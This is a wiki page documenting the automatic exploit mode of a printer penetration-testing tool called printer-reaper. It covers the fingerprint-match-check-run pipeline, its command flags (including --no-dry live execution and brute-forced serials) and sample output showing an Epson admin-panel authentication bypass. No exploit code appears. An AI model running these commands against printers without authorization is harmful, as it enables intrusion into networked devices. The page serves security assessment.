Skip to content

Auto Exploit

Jump to bottom
Andre Henrique edited this page Mar 25, 2026 · 1 revision

Auto Exploit

--auto-exploit automatically selects, verifies, and executes the best exploit for the detected target — no manual exploit selection required.

How It Works

1. Fingerprint     → grab_all() on target (banner, SNMP, HTTP, IPP)
2. Match           → match_exploits() against make/model/firmware/ports/CVEs
3. Sort            → by CVSS score descending
4. Verify (check)  → non-destructive probe on top N candidates
5. Pre-fill params → host, port, serial, mac, vendor auto-populated
6. Execute (run)   → top confirmed-vulnerable exploit(s), dry-run by default
7. Report          → summary table of all checked/executed exploits

The program determines which exploits apply — you do not choose.

Basic Usage

# Auto exploit (dry-run — safe, no destructive actions)
python printer-reaper.py 192.168.1.100 --auto-exploit

# With known serial number (pre-fills exploit parameters that require serial)
python printer-reaper.py 192.168.1.100 --auto-exploit --bf-serial XAABT77481

# With MAC address
python printer-reaper.py 192.168.1.100 --auto-exploit --bf-mac AA:BB:CC:DD:EE:FF

# Live exploitation — AUTHORIZED LABS ONLY
python printer-reaper.py 192.168.1.100 --auto-exploit --no-dry

# Restrict to a specific exploit source
python printer-reaper.py 192.168.1.100 --auto-exploit --xpl-source metasploit
python printer-reaper.py 192.168.1.100 --auto-exploit --xpl-source exploit-db
python printer-reaper.py 192.168.1.100 --auto-exploit --xpl-source research
python printer-reaper.py 192.168.1.100 --auto-exploit --xpl-source custom

All --auto-exploit Flags

Flag Default Description
--auto-exploit Enable automatic exploit pipeline
--auto-exploit-limit N 8 Max exploits to probe with check()
--auto-exploit-run N 1 Number of confirmed exploits to execute
--auto-exploit-file FILE None Path to a custom .py exploit file to force-use
--xpl-source SOURCE all Restrict to: metasploit, exploit-db, research, custom
--no-dry dry-run Execute live (removes dry-run protection)
--bf-serial SERIAL Serial number — auto-passed to exploits that need it
--bf-mac MAC MAC address — auto-passed to exploits that need it

Custom Exploit File

Force the auto pipeline to use a specific exploit file, with all parameters pre-filled automatically:

# Your own exploit.py — host/port/serial/vendor filled in automatically
python printer-reaper.py 192.168.1.100 --auto-exploit \
  --auto-exploit-file /path/to/my_exploit.py \
  --bf-serial XAABT77481

# The program calls:
#   check("192.168.1.100", port=80, timeout=10)  → True/False
#   run("192.168.1.100", port=80, serial="XAABT77481", dry_run=True)

Your exploit file must export check() and run() with the standard contract (see Exploit Library).

Parameter Pre-Filling

The engine automatically populates exploit run() parameters from:

Exploit requires entry Source
serial --bf-serial or extracted from --scan
mac --bf-mac
vendor Detected from fingerprint (make field)
host Target IP argument
port Exploit metadata port field, or first open port

Example Output

>> Auto Exploit — 192.168.1.100

  Fingerprint:
  Make     : Epson
  Model    : L3250 Series
  Firmware : 05.22.XF26P8
  Open ports: 80, 443, 631, 9100

  =================================================================
  AUTO EXPLOIT — 192.168.1.100
  Target  : Epson L3250 Series 05.22.XF26P8
  Matched : 4 exploit(s)
  Mode    : DRY-RUN
  =================================================================

  [check] HIGH     CVSS 7.5  research-epson-http-auth-bypass  Epson HTTP Auth Bypass
          [VULN]
  [check] MEDIUM   CVSS 6.5  research-canon-session-fixation  Canon/Epson Session Fixation
          [NOT VULN]
  [check] HIGH     CVSS 7.8  edb-35151  HP/Epson PJL Info Disclosure
          [VULN]
  [check] LOW      CVSS 5.3  research-ipp-anon-job  IPP Anonymous Job Submission
          [VULN]

  DRY-RUN Running research-epson-http-auth-bypass against 192.168.1.100:80

  [VULN] research-epson-http-auth-bypass
  Evidence:
    GET /PRESENTATION/HTML/TOP/PRTINFO.HTML → 200 OK
    admin panel accessible without authentication
    Firmware: 05.22.XF26P8
    Serial extracted: XAABT77481

  =================================================================
  AUTO EXPLOIT SUMMARY
  Checked    : 4 exploit(s)
  Vulnerable : 3
  Executed   : 1
  =================================================================
  EXPLOIT                        CVSS   VULN     RAN   STATUS
  -----------------------------------------------------------------
  research-epson-http-auth-bypass 7.5   YES      YES   [DRY-RUN] Would bypass auth
  edb-35151                       7.8   YES      no    -
  research-ipp-anon-job           5.3   YES      no    -
  research-canon-session-fixation 6.5   no       no    -

Combining With Other Modes

# Full pipeline: scan → auto-exploit (most thorough)
python printer-reaper.py 192.168.1.100 --scan --auto-exploit

# Auto exploit after brute-force (serial known)
python printer-reaper.py 192.168.1.100 --bruteforce --bf-vendor epson --bf-serial XAABT77481
python printer-reaper.py 192.168.1.100 --auto-exploit --bf-serial XAABT77481

# Run multiple confirmed exploits
python printer-reaper.py 192.168.1.100 --auto-exploit --auto-exploit-run 3 --no-dry

# Check more candidates (wider net)
python printer-reaper.py 192.168.1.100 --auto-exploit --auto-exploit-limit 20

vs Manual Exploit Selection

Feature Manual (--xpl-check, --xpl-run) Auto (--auto-exploit)
Exploit selection User chooses ID Program selects based on fingerprint
Parameter filling User provides manually Auto-filled from scan/flags
Vulnerability check Optional (--xpl-check) Always performed before run
Best for Known target, specific CVE Unknown target, quick assessment
Output Single exploit result Ranked list of all checked exploits

Clone this wiki locally